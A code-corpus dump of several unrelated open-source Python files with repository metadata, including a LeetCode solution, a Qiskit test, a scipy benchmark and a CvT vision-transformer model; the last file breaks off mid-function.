] | null | null | null | core/segments/base.py | molejar/imxmi | 1d59af80d3c5605b8b5c4d5734c05dfd9b75854d | [
"BSD-3-Clause"
] | null | null | null | # Copyright (c) 2017-2019 Martin Olejar
#
# SPDX-License-Identifier: BSD-3-Clause
# The BSD-3-Clause license for this file can be found in the LICENSE file included with this distribution
# or at https://spdx.org/licenses/BSD-3-Clause.html#licenseText
import os
from voluptuous import Schema, ALLOW_EXTRA
def get_full_path(root, *path_list):
    """Resolve each given path either as-is or relative to `root`.

    :param root: base directory used as a fallback prefix
    :param path_list: path strings to resolve
    :return: list of normalized, existing paths (one per input)
    :raises Exception: if some path exists in neither location
    """
    resolved = []
    for path in path_list:
        found = ""
        # Prefer the path itself; fall back to root-relative resolution.
        for candidate in (path, os.path.join(root, path)):
            candidate = os.path.normpath(candidate)
            if os.path.exists(candidate):
                found = candidate
                break
        if not found:
            raise Exception("Path: \"%s\" doesnt exist" % path)
        resolved.append(found)
    return resolved
def get_data_segment(db, name):
    """Look up a data segment in `db` by its full name (case-insensitive).

    :param db: list of data-segment objects
    :param name: segment full name, e.g. "boot.base"
    :return: the matching segment object
    :raises Exception: when no segment with that name exists
    """
    assert isinstance(db, list), ""
    assert isinstance(name, str), ""

    wanted = name.upper()
    for segment in db:
        if segment.full_name == wanted:
            return segment
    raise Exception("{} doesn't exist !".format(name))
class DatSegBase(object):
    """Common base class for data segments.

    Subclasses override MARK (the segment-type suffix used in full_name)
    and SCHEMA (the voluptuous schema used to validate raw smx data).
    """

    MARK = 'base'
    SCHEMA = {}

    @property
    def loaded(self):
        # A segment counts as loaded once an smx description was accepted.
        return self.smx_data is not None

    @property
    def full_name(self):
        return '{}.{}'.format(self.name, self.MARK)

    def __init__(self, name, smx_data=None):
        """Create a data segment.

        :param name: segment name (string)
        :param smx_data: optional raw description; validated via init()
        """
        assert isinstance(name, str)
        self.name = name
        self.data = None
        self.smx_data = None
        if smx_data is not None:
            self.init(smx_data)

    def __str__(self):
        """String representation (delegates to info())."""
        return self.info()

    def __ne__(self, node):
        """Segments are unequal exactly when they are not equal."""
        return not self.__eq__(node)

    def init(self, smx_data):
        """Validate and store the raw smx description.

        :param smx_data: dict matching SCHEMA (extra keys are allowed)
        """
        assert isinstance(smx_data, dict)
        validator = Schema(self.SCHEMA, extra=ALLOW_EXTRA)
        self.smx_data = validator(smx_data)

    def info(self):
        return self.full_name

    def load(self, db, root_path):
        raise NotImplementedError()
| 24.783505 | 105 | 0.596922 |
ace9437ae9e2ea4e7792377ddd3ef15500482077 | 931 | py | Python | generate_matrix.py | xinming365/LeetCode | e56097a60ddd1b5ddba7f15a726661c2aa6633e7 | [
"Apache-2.0"
] | null | null | null | generate_matrix.py | xinming365/LeetCode | e56097a60ddd1b5ddba7f15a726661c2aa6633e7 | [
"Apache-2.0"
] | null | null | null | generate_matrix.py | xinming365/LeetCode | e56097a60ddd1b5ddba7f15a726661c2aa6633e7 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2022/1/22 11:28 上午
# @Author : xinming
# @File : generate_matrix.py
from typing import List
class Solution:
    def generateMatrix(self, n: int) -> List[List[int]]:
        """Fill an n x n matrix with 1..n*n in clockwise spiral order."""
        grid = [[0] * n for _ in range(n)]
        left, right, top, bottom = 0, n - 1, 0, n - 1
        value, last = 1, n * n
        while value <= last:
            # left -> right along the current top row
            for col in range(left, right + 1):
                grid[top][col] = value
                value += 1
            top += 1
            # top -> bottom along the current right column
            for row in range(top, bottom + 1):
                grid[row][right] = value
                value += 1
            right -= 1
            # right -> left along the current bottom row
            for col in range(right, left - 1, -1):
                grid[bottom][col] = value
                value += 1
            bottom -= 1
            # bottom -> top along the current left column
            for row in range(bottom, top - 1, -1):
                grid[row][left] = value
                value += 1
            left += 1
        return grid
if __name__=='__main__':
    # Quick manual check: print the 3x3 spiral matrix.
    s =3
    out = Solution().generateMatrix(s)
    print(out)
| 23.871795 | 56 | 0.421053 |
ace944bc95e0335be4160941f4a1d8bf81ff8c1e | 163 | py | Python | geostream/producer/tests/conftest.py | yoophi/geo-stream-kafka | 77fac42350616bf3e882fb783cb44c3627556422 | [
"MIT"
] | 42 | 2020-05-03T15:10:30.000Z | 2022-03-24T17:10:24.000Z | geostream/producer/tests/conftest.py | yoophi/geo-stream-kafka | 77fac42350616bf3e882fb783cb44c3627556422 | [
"MIT"
] | 2 | 2021-04-18T15:18:57.000Z | 2022-03-18T09:09:01.000Z | geostream/producer/tests/conftest.py | yoophi/geo-stream-kafka | 77fac42350616bf3e882fb783cb44c3627556422 | [
"MIT"
] | 15 | 2020-03-11T02:46:30.000Z | 2022-03-12T10:27:56.000Z | import pytest
from app.main import app
from starlette.testclient import TestClient
@pytest.fixture
def test_app():
    """Yield a Starlette TestClient wired to the application under test."""
    client = TestClient(app)
    yield client
| 16.3 | 43 | 0.766871 |
ace944e79b5c4585b4961171976ad301f8b70865 | 2,174 | py | Python | lightning_transformers/task/nlp/summarization/model.py | maksym-taranukhin/lightning-transformers | aa7202657973b5b65c3c36eb745621043859ebc4 | [
"Apache-2.0"
] | null | null | null | lightning_transformers/task/nlp/summarization/model.py | maksym-taranukhin/lightning-transformers | aa7202657973b5b65c3c36eb745621043859ebc4 | [
"Apache-2.0"
] | null | null | null | lightning_transformers/task/nlp/summarization/model.py | maksym-taranukhin/lightning-transformers | aa7202657973b5b65c3c36eb745621043859ebc4 | [
"Apache-2.0"
] | null | null | null | # Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from lightning_transformers.core.nlp.seq2seq import Seq2SeqTransformer
from lightning_transformers.task.nlp.summarization.config import SummarizationConfig
from lightning_transformers.task.nlp.summarization.metric import RougeMetric
class SummarizationTransformer(Seq2SeqTransformer):
    """
    Defines ``LightningModule`` for the Summarization Task.

    Args:
        *args: :class:`lightning_transformers.core.nlp.seq2seq.Seq2SeqTransformer` arguments.
        downstream_model_type: Downstream HuggingFace AutoModel to load.
            (default ``transformers.AutoModelForSeq2SeqLM``)
        **kwargs: :class:`lightning_transformers.core.nlp.seq2seq.Seq2SeqTransformer` arguments.
    """

    def __init__(
        self,
        *args,
        downstream_model_type: str = 'transformers.AutoModelForSeq2SeqLM',
        # NOTE(review): the default cfg instance is shared across all
        # constructions — confirm SummarizationConfig is immutable.
        cfg: SummarizationConfig = SummarizationConfig(),
        **kwargs
    ) -> None:
        super().__init__(downstream_model_type, *args, cfg=cfg, **kwargs)
        # Metric is created lazily in configure_metrics (per stage).
        self.rouge = None

    def compute_generate_metrics(self, batch, prefix):
        """Generate summaries for `batch` and log ROUGE against the labels."""
        tgt_lns = self.tokenize_labels(batch["labels"])
        pred_lns = self.generate(batch["input_ids"], batch["attention_mask"])
        result = self.rouge(pred_lns, tgt_lns)
        self.log_dict(result, on_step=False, on_epoch=True)

    def configure_metrics(self, stage: str):
        """Instantiate the ROUGE metric from the task configuration."""
        self.rouge = RougeMetric(
            rouge_newline_sep=self.cfg.rouge_newline_sep,
            use_stemmer=self.cfg.use_stemmer,
        )

    @property
    def hf_pipeline_task(self) -> str:
        # Name of the matching HuggingFace pipeline task.
        return "summarization"
| 39.527273 | 96 | 0.720331 |
ace945416a337c67f7cca2fb03f3536909822106 | 3,287 | py | Python | test/calibration/experiments/test_ramsey_xy.py | coruscating/qiskit-experiments | dac1febf13be870d3bac16af22aa341a088e0766 | [
"Apache-2.0"
] | null | null | null | test/calibration/experiments/test_ramsey_xy.py | coruscating/qiskit-experiments | dac1febf13be870d3bac16af22aa341a088e0766 | [
"Apache-2.0"
] | 1 | 2021-06-01T01:43:52.000Z | 2021-06-01T01:43:52.000Z | test/calibration/experiments/test_ramsey_xy.py | coruscating/qiskit-experiments | dac1febf13be870d3bac16af22aa341a088e0766 | [
"Apache-2.0"
] | 2 | 2021-05-17T10:13:20.000Z | 2021-06-01T01:34:34.000Z | # This code is part of Qiskit.
#
# (C) Copyright IBM 2021.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""Test Ramsey XY experiments."""
from qiskit.test import QiskitTestCase
from qiskit.test.mock import FakeArmonk
from qiskit_experiments.calibration_management.backend_calibrations import BackendCalibrations
from qiskit_experiments.calibration_management.basis_gate_library import FixedFrequencyTransmon
from qiskit_experiments.library import RamseyXY, FrequencyCal
from qiskit_experiments.test.mock_iq_backend import MockRamseyXY
class TestRamseyXY(QiskitTestCase):
    """Tests for the Ramsey XY experiment."""

    def setUp(self):
        """Initialize some cals."""
        super().setUp()
        library = FixedFrequencyTransmon()
        self.cals = BackendCalibrations(FakeArmonk(), library)

    def test_end_to_end(self):
        """Test that we can run on a mock backend and perform a fit.
        This test also checks that we can pickup frequency shifts with different signs.
        """
        test_tol = 0.01
        ramsey = RamseyXY(0)
        for freq_shift in [2e6, -3e6]:
            test_data = ramsey.run(MockRamseyXY(freq_shift=freq_shift)).block_for_results()
            meas_shift = test_data.analysis_results(1).value.value
            self.assertTrue((meas_shift - freq_shift) < abs(test_tol * freq_shift))

    def test_update_calibrations(self):
        """Test that the calibration version of the experiment updates the cals."""
        tol = 1e4  # 10 kHz resolution

        # Check qubit frequency before running the cal
        f01 = self.cals.get_parameter_value("qubit_lo_freq", 0)
        # NOTE(review): assertTrue(len(...), 1) treats the 1 as the msg
        # argument and only checks truthiness — likely meant assertEqual;
        # confirm the expected row count before changing (same below).
        self.assertTrue(len(self.cals.parameters_table(parameters=["qubit_lo_freq"])["data"]), 1)
        self.assertEqual(f01, FakeArmonk().defaults().qubit_freq_est[0])

        freq_shift = 4e6
        osc_shift = 2e6
        backend = MockRamseyXY(freq_shift=freq_shift + osc_shift)  # oscillation with 6 MHz
        FrequencyCal(0, self.cals, backend, osc_freq=osc_shift).run().block_for_results()

        # Check that qubit frequency after running the cal is shifted by freq_shift, i.e. 4 MHz.
        f01 = self.cals.get_parameter_value("qubit_lo_freq", 0)
        self.assertTrue(len(self.cals.parameters_table(parameters=["qubit_lo_freq"])["data"]), 2)
        self.assertTrue(abs(f01 - (freq_shift + FakeArmonk().defaults().qubit_freq_est[0])) < tol)

    def test_experiment_config(self):
        """Test converting to and from config works"""
        exp = RamseyXY(0)
        config = exp.config
        loaded_exp = RamseyXY.from_config(config)
        self.assertNotEqual(exp, loaded_exp)
        self.assertEqual(config, loaded_exp.config)

        exp = FrequencyCal(0, self.cals)
        config = exp.config
        loaded_exp = FrequencyCal.from_config(config)
        self.assertNotEqual(exp, loaded_exp)
        self.assertEqual(config, loaded_exp.config)
| 40.085366 | 98 | 0.706115 |
ace9457ae3646732df90d57402bd200b6842a5e1 | 3,787 | py | Python | cs15211/VerifyinganAlienDictionary.py | JulyKikuAkita/PythonPrac | 0ba027d9b8bc7c80bc89ce2da3543ce7a49a403c | [
"Apache-2.0"
] | 1 | 2021-07-05T01:53:30.000Z | 2021-07-05T01:53:30.000Z | cs15211/VerifyinganAlienDictionary.py | JulyKikuAkita/PythonPrac | 0ba027d9b8bc7c80bc89ce2da3543ce7a49a403c | [
"Apache-2.0"
] | null | null | null | cs15211/VerifyinganAlienDictionary.py | JulyKikuAkita/PythonPrac | 0ba027d9b8bc7c80bc89ce2da3543ce7a49a403c | [
"Apache-2.0"
] | 1 | 2018-01-08T07:14:08.000Z | 2018-01-08T07:14:08.000Z | # coding=utf-8
__source__ = 'https://leetcode.com/problems/verifying-an-alien-dictionary/'
# Time: O(N)
# Space: O(1)
#
# Description: Leetcode # 953. Verifying an Alien Dictionary
#
# In an alien language, surprisingly they also use english lowercase letters,
# but possibly in a different order.
# The order of the alphabet is some permutation of lowercase letters.
#
# Given a sequence of words written in the alien language, and the order of the alphabet,
# return true if and only if the given words are sorted lexicographicaly in this alien language.
#
# Example 1:
#
# Input: words = ["hello","leetcode"], order = "hlabcdefgijkmnopqrstuvwxyz"
# Output: true
# Explanation: As 'h' comes before 'l' in this language, then the sequence is sorted.
# Example 2:
#
# Input: words = ["word","world","row"], order = "worldabcefghijkmnpqstuvxyz"
# Output: false
# Explanation: As 'd' comes after 'l' in this language, then words[0] > words[1],
# hence the sequence is unsorted.
# Example 3:
#
# Input: words = ["apple","app"], order = "abcdefghijklmnopqrstuvwxyz"
# Output: false
# Explanation: The first three characters "app" match,
# and the second string is shorter (in size.)
# According to lexicographical rules "apple" > "app",
# because 'l' > '∅', where '∅' is defined as the blank character
# which is less than any other character (More info).
#
#
# Note:
#
# 1 <= words.length <= 100
# 1 <= words[i].length <= 20
# order.length == 26
# All characters in words[i] and order are english lowercase letters.
#
import unittest
# 28ms 100%
class Solution(object):
    def isAlienSorted(self, words, order):
        """Check that `words` is sorted under the alien alphabet `order`.

        :type words: List[str]
        :type order: str
        :rtype: bool
        """
        # Rank of each letter in the alien alphabet.
        order_index = {c: i for i, c in enumerate(order)}

        # `range` instead of the Python-2-only `xrange`: iterates the same
        # way on both Python 2 and 3.
        for i in range(len(words) - 1):
            word1 = words[i]
            word2 = words[i+1]

            # Find the first difference word1[k] != word2[k].
            for k in range(min(len(word1), len(word2))):
                if word1[k] != word2[k]:
                    # If they compare badly, it's not sorted.
                    if order_index[word1[k]] > order_index[word2[k]]:
                        return False
                    break
            else:
                # If we didn't find a first difference, the shorter word must
                # come first: ("app", "apple") is fine, ("apple", "app") is not.
                if len(word1) > len(word2):
                    return False
        return True
class TestMethods(unittest.TestCase):
    # Placeholder test so the file is runnable under unittest.
    def test_Local(self):
        self.assertEqual(1, 1)

if __name__ == '__main__':
    unittest.main()
Java = '''
# Thought: https://leetcode.com/problems/verifying-an-alien-dictionary/solution/
Approach 1: Check Adjacent Words
Complexity Analysis
Time Complexity: O(C), where C is the total content of words.
Space Complexity: O(1)
# 4ms 100%
class Solution {
public boolean isAlienSorted(String[] words, String order) {
int[] map = new int[26];
for (int i = 0; i < 26; i++) {
map[order.charAt(i) - 'a'] = i;
}
if (words == null || words.length <= 1) return true;
for (int i = 1; i < words.length; i++) {
if (comp(words[i - 1], words[i], map)) { // true if words[i-1] > words[i]
return false;
}
}
return true;
}
private boolean comp(String a, String b, int[] map) {
int alen = a.length(), blen = b.length(), minlen = Math.min(alen, blen);
char[] as = a.toCharArray(), bs = b.toCharArray();
for (int i = 0; i < minlen; i++) {
if (map[as[i] - 'a'] < map[bs[i] - 'a']) return false;
else if (map[as[i] - 'a'] == map[bs[i] - 'a']) continue;
else return true;
}
return alen > blen;
}
}
''' | 32.367521 | 96 | 0.589913 |
ace94678baa7439075cf0b27e393b38ad9b60eee | 5,018 | py | Python | lib/node_modules/@stdlib/stats/base/dists/lognormal/ctor/benchmark/python/benchmark.scipy.py | ghalimi/stdlib | 88f50b88aa945875ef053e2f89d26f9150a18c12 | [
"BSL-1.0"
] | 3,428 | 2016-07-14T13:48:46.000Z | 2022-03-31T22:32:13.000Z | lib/node_modules/@stdlib/stats/base/dists/lognormal/ctor/benchmark/python/benchmark.scipy.py | ghalimi/stdlib | 88f50b88aa945875ef053e2f89d26f9150a18c12 | [
"BSL-1.0"
] | 435 | 2016-04-07T18:12:45.000Z | 2022-03-22T15:43:17.000Z | lib/node_modules/@stdlib/stats/base/dists/lognormal/ctor/benchmark/python/benchmark.scipy.py | sthagen/stdlib | 042b6215818db0e2a784e72c7e054167dcefcd2a | [
"BSL-1.0"
] | 188 | 2016-11-29T22:58:11.000Z | 2022-03-17T06:46:43.000Z | #!/usr/bin/env python
#
# @license Apache-2.0
#
# Copyright (c) 2018 The Stdlib Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Benchmark scipy.stats.lognorm."""
from __future__ import print_function
import timeit
REPEATS = 3  # number of times each benchmark statement is timed and reported
COUNT = [0]  # use a list to allow modification within nested scopes
def print_version():
    """Emit the TAP protocol version header."""
    tap_header = "TAP version 13"
    print(tap_header)
def print_summary(total, passing):
    """Emit the TAP benchmark summary.

    # Arguments

    * `total`: total number of tests
    * `passing`: number of passing tests
    """
    summary_lines = (
        "#",
        "1.." + str(total),  # TAP plan
        "# total " + str(total),
        "# pass " + str(passing),
        "#",
        "# ok",
    )
    for line in summary_lines:
        print(line)
def print_results(iterations, elapsed):
    """Emit a TAP YAML block with benchmark results.

    # Arguments

    * `iterations`: number of iterations
    * `elapsed`: elapsed time (in seconds)

    # Examples

    ``` python
    python> print_results(1000000, 0.131009101868)
    ```
    """
    throughput = iterations / elapsed
    for line in (
        " ---",
        " iterations: " + str(iterations),
        " elapsed: " + str(elapsed),
        " rate: " + str(throughput),
        " ...",
    ):
        print(line)
def benchmark(name, setup, stmt, iterations):
    """Run the benchmark and print benchmark results in TAP format.

    # Arguments

    * `name`: benchmark name
    * `setup`: benchmark setup
    * `stmt`: statement to benchmark
    * `iterations`: number of iterations

    # Examples

    ``` python
    python> benchmark("random", "from random import random;", "y = random()", 1000000)
    ```
    """
    t = timeit.Timer(stmt, setup=setup)
    # NOTE(review): the TAP version header is re-emitted on every call, not
    # once per run — presumably matches the consumer's expectations; confirm.
    print_version()
    i = 0
    while i < REPEATS:
        print("# python::" + name)
        # COUNT is a module-level single-element list used as a mutable
        # counter; it numbers the "ok N" TAP lines across all benchmarks.
        COUNT[0] += 1
        elapsed = t.timeit(number=iterations)
        print_results(iterations, elapsed)
        print("ok " + str(COUNT[0]) + " benchmark finished")
        i += 1
def main():
    """Run the benchmarks.

    The original repeated an identical four-line setup/benchmark block
    eleven times; this version drives `benchmark` from a table of
    (method label, statement) pairs, preserving the original order,
    setup string, and iteration count exactly.
    """
    setup = "from scipy.stats import lognorm; from random import random; rv = lognorm(1.0, 2.3);"
    iterations = 1000
    # (method label, statement) pairs, in the original benchmark order.
    cases = [
        ("entropy", "y = rv.entropy()"),
        ("kurtosis", "y = rv.stats(moments='k')"),
        ("mean", "y = rv.mean()"),
        ("median", "y = rv.median()"),
        ("skewness", "y = rv.stats(moments='s')"),
        ("stdev", "y = rv.std()"),
        ("variance", "y = rv.var()"),
        ("cdf", "y = rv.cdf(random())"),
        ("logpdf", "y = rv.logpdf(random())"),
        ("pdf", "y = rv.pdf(random())"),
        ("quantile", "y = rv.ppf(random())"),
    ]
    for method, stmt in cases:
        benchmark("lognorm:" + method, setup, stmt, iterations)
    print_summary(COUNT[0], COUNT[0])
# Script entry point: run the benchmark suite when executed directly.
if __name__ == "__main__":
    main()
| 28.511364 | 97 | 0.635711 |
ace9468d751bb7af1c3ee649ad895952086d82f8 | 187 | py | Python | mayan/apps/storage/backends/literals.py | nattangwiwat/Mayan-EDMS-recitation | fcf16afb56eae812fb99144d65ae1ae6749de0b7 | [
"Apache-2.0"
] | 343 | 2015-01-05T14:19:35.000Z | 2018-12-10T19:07:48.000Z | mayan/apps/storage/backends/literals.py | nattangwiwat/Mayan-EDMS-recitation | fcf16afb56eae812fb99144d65ae1ae6749de0b7 | [
"Apache-2.0"
] | 191 | 2015-01-03T00:48:19.000Z | 2018-11-30T09:10:25.000Z | mayan/apps/storage/backends/literals.py | nattangwiwat/Mayan-EDMS-recitation | fcf16afb56eae812fb99144d65ae1ae6749de0b7 | [
"Apache-2.0"
] | 257 | 2019-05-14T10:26:37.000Z | 2022-03-30T03:37:36.000Z | ENCRYPTION_FILE_CHUNK_SIZE = 64 * 1024 # 64K
ENCRYPTION_KEY_DERIVATION_ITERATIONS = 100000
ENCRYPTION_KEY_SIZE = 32
ZIP_CHUNK_SIZE = 64 * 1024 # 64K
ZIP_MEMBER_FILENAME = 'mayan_file'
| 26.714286 | 45 | 0.802139 |
ace9490b45336c762711aeea73d03d21914908a9 | 31,161 | py | Python | timmextension/models/cvt.py | okotaku/timmextension | 0fde1e848ddfbb632fbebefd98fdb3171cb0733b | [
"Apache-2.0"
] | null | null | null | timmextension/models/cvt.py | okotaku/timmextension | 0fde1e848ddfbb632fbebefd98fdb3171cb0733b | [
"Apache-2.0"
] | null | null | null | timmextension/models/cvt.py | okotaku/timmextension | 0fde1e848ddfbb632fbebefd98fdb3171cb0733b | [
"Apache-2.0"
] | null | null | null | # --------------------------------------------------------
# Model from official source: https://github.com/microsoft/CvT
# --------------------------------------------------------
import collections.abc as container_abcs
import logging
import os
from collections import OrderedDict
from functools import partial
from itertools import repeat
import numpy as np
import scipy
import torch
import torch.nn as nn
import torch.nn.functional as F
from einops import rearrange
from einops.layers.torch import Rearrange
from timm.data import IMAGENET_DEFAULT_MEAN, IMAGENET_DEFAULT_STD
from timm.models.helpers import build_model_with_cfg
from timm.models.layers import DropPath, trunc_normal_
from timm.models.registry import register_model
def _cfg(url='', **kwargs):
    """Build a timm-style default pretrained config dict.

    `kwargs` override any of the base keys.
    """
    cfg = {
        'url': url,
        'num_classes': 1000,
        'input_size': (3, 224, 224),
        'pool_size': None,
        'crop_pct': None,
        'interpolation': None,
        'mean': IMAGENET_DEFAULT_MEAN,
        'std': IMAGENET_DEFAULT_STD,
        'classifier': 'head',
    }
    cfg.update(kwargs)
    return cfg
default_cfgs = {
'cvt_13_224':
_cfg(
url=
'https://github.com/okotaku/timmextension/releases/download/w_cvt/CvT-13-224x224-IN-1k.pth' # noqa
),
'cvt_13_384':
_cfg(
url=
'https://github.com/okotaku/timmextension/releases/download/w_cvt/CvT-13-384x384-IN-1k.pth' # noqa
),
'cvt_13_384_22k':
_cfg(
url=
'https://github.com/okotaku/timmextension/releases/download/w_cvt/CvT-13-384x384-IN-22k.pth' # noqa
),
'cvt_21_224':
_cfg(
url=
'https://github.com/okotaku/timmextension/releases/download/w_cvt/CvT-21-224x224-IN-1k.pth' # noqa
),
'cvt_21_384':
_cfg(
url=
'https://github.com/okotaku/timmextension/releases/download/w_cvt/CvT-21-384x384-IN-1k.pth' # noqa
),
'cvt_21_384_22k':
_cfg(
url=
'https://github.com/okotaku/timmextension/releases/download/w_cvt/CvT-21-384x384-IN-22k.pth' # noqa
),
'cvt_w24':
_cfg(
url=
'https://github.com/okotaku/timmextension/releases/download/w_cvt/vip_s7.pth' # noqa
),
}
# From PyTorch internals
# From PyTorch internals
def _ntuple(n):
    """Return a converter that broadcasts a scalar into an ``n``-tuple.

    Iterable inputs are passed through unchanged (mirrors torch internals).
    """
    def parse(value):
        if isinstance(value, container_abcs.Iterable):
            return value
        return tuple(repeat(value, n))
    return parse


to_1tuple = _ntuple(1)
to_2tuple = _ntuple(2)
to_3tuple = _ntuple(3)
to_4tuple = _ntuple(4)
to_ntuple = _ntuple
class LayerNorm(nn.LayerNorm):
    """LayerNorm that normalizes in float32 so fp16 inputs stay numerically
    stable, then casts back to the input dtype."""

    def forward(self, x: torch.Tensor):
        input_dtype = x.dtype
        normalized = super().forward(x.type(torch.float32))
        return normalized.type(input_dtype)
class QuickGELU(nn.Module):
    """Fast sigmoid-based GELU approximation: ``x * sigmoid(1.702 * x)``."""

    def forward(self, x: torch.Tensor):
        gate = torch.sigmoid(1.702 * x)
        return x * gate
class Mlp(nn.Module):
    """Two-layer feed-forward block: fc1 -> act -> drop -> fc2 -> drop.

    Hidden/output widths default to `in_features` when not given.
    """

    def __init__(self,
                 in_features,
                 hidden_features=None,
                 out_features=None,
                 act_layer=nn.GELU,
                 drop=0.):
        super().__init__()
        out_features = out_features or in_features
        hidden_features = hidden_features or in_features
        self.fc1 = nn.Linear(in_features, hidden_features)
        self.act = act_layer()
        self.fc2 = nn.Linear(hidden_features, out_features)
        self.drop = nn.Dropout(drop)

    def forward(self, x):
        hidden = self.drop(self.act(self.fc1(x)))
        return self.drop(self.fc2(hidden))
class Attention(nn.Module):
    """Convolutional multi-head self-attention from CvT.

    Q/K/V are first projected over the 2-D token map with (by default)
    depth-wise conv + BN, then linearly projected per head. K/V may be
    strided (`stride_kv`) to shrink the attention footprint. A cls token,
    if present, bypasses the convolutional projections.
    """
    def __init__(self,
                 dim_in,
                 dim_out,
                 num_heads,
                 qkv_bias=False,
                 attn_drop=0.,
                 proj_drop=0.,
                 method='dw_bn',
                 kernel_size=3,
                 stride_kv=1,
                 stride_q=1,
                 padding_kv=1,
                 padding_q=1,
                 with_cls_token=True,
                 **kwargs):
        super().__init__()
        self.stride_kv = stride_kv
        self.stride_q = stride_q
        self.dim = dim_out
        self.num_heads = num_heads
        # head_dim = self.qkv_dim // num_heads
        # NOTE(review): scale uses full dim_out, not the per-head dim; this
        # matches the upstream CvT release — confirm before "fixing".
        self.scale = dim_out**-0.5
        self.with_cls_token = with_cls_token
        # When K/V use average pooling, the query falls back to the identity
        # ('linear') projection instead of being pooled.
        self.conv_proj_q = self._build_projection(
            dim_in, dim_out, kernel_size, padding_q, stride_q,
            'linear' if method == 'avg' else method)
        self.conv_proj_k = self._build_projection(dim_in, dim_out, kernel_size,
                                                  padding_kv, stride_kv,
                                                  method)
        self.conv_proj_v = self._build_projection(dim_in, dim_out, kernel_size,
                                                  padding_kv, stride_kv,
                                                  method)
        self.proj_q = nn.Linear(dim_in, dim_out, bias=qkv_bias)
        self.proj_k = nn.Linear(dim_in, dim_out, bias=qkv_bias)
        self.proj_v = nn.Linear(dim_in, dim_out, bias=qkv_bias)
        self.attn_drop = nn.Dropout(attn_drop)
        self.proj = nn.Linear(dim_out, dim_out)
        self.proj_drop = nn.Dropout(proj_drop)
    def _build_projection(self, dim_in, dim_out, kernel_size, padding, stride,
                          method):
        # Returns a module mapping (B, C, H, W) -> (B, H*W, C), or None for
        # the plain 'linear' (identity) projection.
        if method == 'dw_bn':
            # Depth-wise conv + BatchNorm, then flatten the spatial grid.
            proj = nn.Sequential(
                OrderedDict([
                    ('conv',
                     nn.Conv2d(dim_in,
                               dim_in,
                               kernel_size=kernel_size,
                               padding=padding,
                               stride=stride,
                               bias=False,
                               groups=dim_in)),
                    ('bn', nn.BatchNorm2d(dim_in)),
                    ('rearrage', Rearrange('b c h w -> b (h w) c')),
                ]))
        elif method == 'avg':
            # Parameter-free average pooling (used for K/V downsampling).
            proj = nn.Sequential(
                OrderedDict([
                    ('avg',
                     nn.AvgPool2d(kernel_size=kernel_size,
                                  padding=padding,
                                  stride=stride,
                                  ceil_mode=True)),
                    ('rearrage', Rearrange('b c h w -> b (h w) c')),
                ]))
        elif method == 'linear':
            proj = None
        else:
            raise ValueError('Unknown method ({})'.format(method))
        return proj
    def forward_conv(self, x, h, w):
        """Compute conv-projected q/k/v token sequences from (B, T, C) input."""
        # The cls token (if any) is split off so only grid tokens go through
        # the convolutional projections, and is re-attached afterwards.
        if self.with_cls_token:
            cls_token, x = torch.split(x, [1, h * w], 1)
        x = rearrange(x, 'b (h w) c -> b c h w', h=h, w=w)
        if self.conv_proj_q is not None:
            q = self.conv_proj_q(x)
        else:
            q = rearrange(x, 'b c h w -> b (h w) c')
        if self.conv_proj_k is not None:
            k = self.conv_proj_k(x)
        else:
            k = rearrange(x, 'b c h w -> b (h w) c')
        if self.conv_proj_v is not None:
            v = self.conv_proj_v(x)
        else:
            v = rearrange(x, 'b c h w -> b (h w) c')
        if self.with_cls_token:
            q = torch.cat((cls_token, q), dim=1)
            k = torch.cat((cls_token, k), dim=1)
            v = torch.cat((cls_token, v), dim=1)
        return q, k, v
    def forward(self, x, h, w):
        """Multi-head attention over tokens `x` laid out on an h x w grid."""
        if (self.conv_proj_q is not None) or (self.conv_proj_k
                                              is not None) or (self.conv_proj_v
                                                               is not None):
            q, k, v = self.forward_conv(x, h, w)
        # Split channels into heads: (B, T, H*D) -> (B, H, T, D).
        q = rearrange(self.proj_q(q), 'b t (h d) -> b h t d', h=self.num_heads)
        k = rearrange(self.proj_k(k), 'b t (h d) -> b h t d', h=self.num_heads)
        v = rearrange(self.proj_v(v), 'b t (h d) -> b h t d', h=self.num_heads)
        # Scaled dot-product attention.
        attn_score = torch.einsum('bhlk,bhtk->bhlt', [q, k]) * self.scale
        attn = F.softmax(attn_score, dim=-1)
        attn = self.attn_drop(attn)
        x = torch.einsum('bhlt,bhtv->bhlv', [attn, v])
        # Merge heads back: (B, H, T, D) -> (B, T, H*D).
        x = rearrange(x, 'b h t d -> b t (h d)')
        x = self.proj(x)
        x = self.proj_drop(x)
        return x
    @staticmethod
    def compute_macs(module, input, output):
        """Profiler hook: accumulate multiply-accumulate counts on the module.

        Assumes a square token grid (H == W derived from the token count).
        """
        # T: num_token
        # S: num_token
        input = input[0]
        flops = 0
        _, T, C = input.shape
        H = int(np.sqrt(T - 1)) if module.with_cls_token else int(np.sqrt(T))
        W = H
        H_Q = H / module.stride_q
        # NOTE(review): W_Q is derived from H, not W — harmless while the
        # grid is square, but worth confirming against upstream.
        W_Q = H / module.stride_q
        T_Q = H_Q * W_Q + 1 if module.with_cls_token else H_Q * W_Q
        H_KV = H / module.stride_kv
        W_KV = W / module.stride_kv
        T_KV = H_KV * W_KV + 1 if module.with_cls_token else H_KV * W_KV
        # C = module.dim
        # S = T
        # Scaled-dot-product macs
        # [B x T x C] x [B x C x T] --> [B x T x S]
        # multiplication-addition is counted as 1 because
        # operations can be fused
        flops += T_Q * T_KV * module.dim
        # [B x T x S] x [B x S x C] --> [B x T x C]
